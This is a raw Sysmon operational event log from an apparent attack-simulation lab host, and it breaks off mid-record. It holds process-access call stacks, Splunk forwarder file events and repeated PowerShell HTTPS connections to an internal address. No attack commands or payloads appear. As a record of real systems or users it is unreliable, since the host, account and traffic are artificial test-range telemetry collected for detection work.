10341000x800000000000000036497695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.256{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:40.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6543E5CB573AA8DEDAD5334705CACEEB,SHA256=3A0354C231B0524FCCA0E5DC223A2A1FEFE7D05C85FEA359B3E985749E472397,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:10.303{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50564-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:40.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDC52643E25FEDD6FA6C02D06AA1332B,SHA256=73E21B5C251797FB644449B824C20C878263CF756F259731A118ADEC52217505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:41.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA16A7B0768E31D35E2DFCA5D996D412,SHA256=324F5B2D9B25450A66425B30E3DE184E0C4640BBE1B47C3F90867A10287F22D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:42.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F2048E55ACD771716A13711C8B488D,SHA256=DD74507343BF36D02DBE8D6211A1AC0230E1EC653FA313F3A224E38C97DF778B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:43.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90021D8721D61C48EEB9059C83C843E,SHA256=495F88900FBFA0715E2580FEE5DAF6C5FDA599712ECF2ED41D761F73AF08C0D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:13.740{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50565-false10.0.1.12-8000- 23542300x800000000000000036497709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:44.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A8156214AC7DC237A2A2313B9793ED5,SHA256=866A02C3857CB98E75368756EC2F67600D182A1CB4B5F9929094FFB0C3E644C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:44.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B14664C6E93626CE5A6034485CF2C48F,SHA256=8F9FC040E7D39B2E66B885ABC4CD8424F574BC29C90075CB3636B9E0CB33555E,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036497711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:45.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4ACE1ADC85512961341D6B463179FE7,SHA256=7BACCBA908C2C582DF5A32479B244716647E2F2B34B52DF57EF537A11115F934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:15.317{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50566-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:46.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF58E4062AA0884D4089207D09881A07,SHA256=7301C9AF382C2533C505BA99DA47E004F1D9F190F8D454645FCDE63E5D423581,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:47.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE32DE4915BD23D14C281EA4B3CF9ACE,SHA256=F58AC4223DA57194B5E3CEFEF58DD534475529C12EA97E5F4511674BEEDC67BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:49.664{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=175ACAB3351F43A60B64D452627E97BB,SHA256=7D01A0667FF6A1FE9FAE9B82FEFBDC2D770C7AE289BD8D296407502298593C47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:49.029{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE13F2AA72775940DB1E8F710B64AC73,SHA256=782B72390BE8304EA83F936DB7DAB2896F4D84B01EC537573FD14D07A646897A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:20.334{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50568-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:19.734{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50567-false10.0.1.12-8000- 23542300x800000000000000036497716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:50.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B4B95E185CCE7F59F93C2BBCEA39DD,SHA256=CA31BEAF3343BE1E93A2132FE705C3C0B7F5F0534046FC000402BE2A04B4E185,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:51.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D56AF5FCB482D6DF2567FDD40734645C,SHA256=0F8D2CBB924FC0FC25A9A3B63927209180DAE9ACE6EF4B1AB81318E8B00F1643,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:52.093{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C34177163756A0F8C8F277450517D9,SHA256=5A7BB66BEF0960475D4529C8856A718820857BD9A9CD055F918673B55754C12B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:53.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC7476A2814FE9A126EDA3BEF26A6F9,SHA256=8DC42FB4E06C04FBA9C59AE7086E81641DEA761D48C223012B1C55BF3C7A8670,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:54.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F70AF3143C1BCF2F7EFD1E0B618819D8,SHA256=F7FDA8CE06F67B083768D4D8B379CEFAB0E1FE1CE123E131E10ED7B4093AF5F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:54.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C481A5AC61F14A1E4B6A6AE24E0B7C0B,SHA256=BD3A0C782629EC45F5522ECEDECCF29CB9BEE8DDF5D2F05F43AD23F63C787158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.345{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50569-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 
23542300x800000000000000036497724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:55.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53B80BAB402B71A4D375B98AC59F53A,SHA256=924CC8CE6D8F1F292E6C331DF045CF131DD04E1E086DF654EAB13501781529F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.760{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50570-false10.0.1.12-8000- 23542300x800000000000000036497726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:56.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F780A72F0CC4263009F584223CACA28,SHA256=585479F491DEE8B595929264C8FE0FFFD2947F52FF4A19B24A041A9E1D7FF6BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:57.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD69A79C93BA7584536B97596C6A1990,SHA256=651966EAFFCCE01EF1601D49AED71E37A2DAA926F876F5C0F0A055C4DE24ADF3,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036497729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:58.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8395615700936959F5FCCA7783C3E17,SHA256=FB8CC68AE6B35B53E3CEC27B8BE4B3331E5721B954EEDBC6D1396B77BDB3FC35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:59.275{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41834269865B4119591C515C017AA3F4,SHA256=DE09F4718FC5908B058C820A28D5D19BD7FF38A6B96F4E009F505E84B47EFDC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:00.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B9601485A1D58B25F1FFA71A85F442E3,SHA256=C91FDEA71A54F547843C125DF22AA2E758364DDECB32208575AB28E87DC2F0DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:00.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E694133A850157F9539743C27A658E1,SHA256=311866AFA53959B86E3B6CCA309D65099A7D2FA293CD5000EDBE14A6E3762BD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:01.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C85B6FB20E14A103380E84AB8F655DFC,SHA256=EAAE0CB07A7C511D7590016A2ABCD3ABDCD14770AC74109260FD19A38D733D7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:31.359{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50572-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:30.759{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50571-false10.0.1.12-8000- 23542300x800000000000000036497736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:02.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B2E0C86DA5CE8508200C0D83C57D180,SHA256=875156F898C0157205CC8760902E544678B5C3D222EE2AA320A2C1700C90CB58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:03.385{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07943A8BA48EDF7421CB44A4B813FC78,SHA256=90F9100DBBAC4CC5A283794931FE037F143D4D956D2803B8CAA198D706282A00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:04.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA9C6BA0535818503DFD9B0625B3257,SHA256=24557C3F2A29E6BECB3A2DA63BA3820AFE01DB72462804668D3BFFAE922A7AE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DBAE33841C52C1D56EEDA76383F23EAA,SHA256=2F1552829684B7F078EE43FCA98E10A005B6246D61F56B56AA3B1497127220F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0BAE5A40CCC9E1EDAF01A70097759F,SHA256=0C9F151088997B522A3FF5635CB24DA8083E4A4BCC79BAB9F74B58363152583E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:06.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0D1F33E08F2CF47726E619B9E17FFD,SHA256=C48CE3E684E38945FDBE2983EB80A49F975E1C835CD7C57129FD96489E7DA332,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:36.374{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50573-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A14B-6140-8D56-04000000C801}432C:\Program 
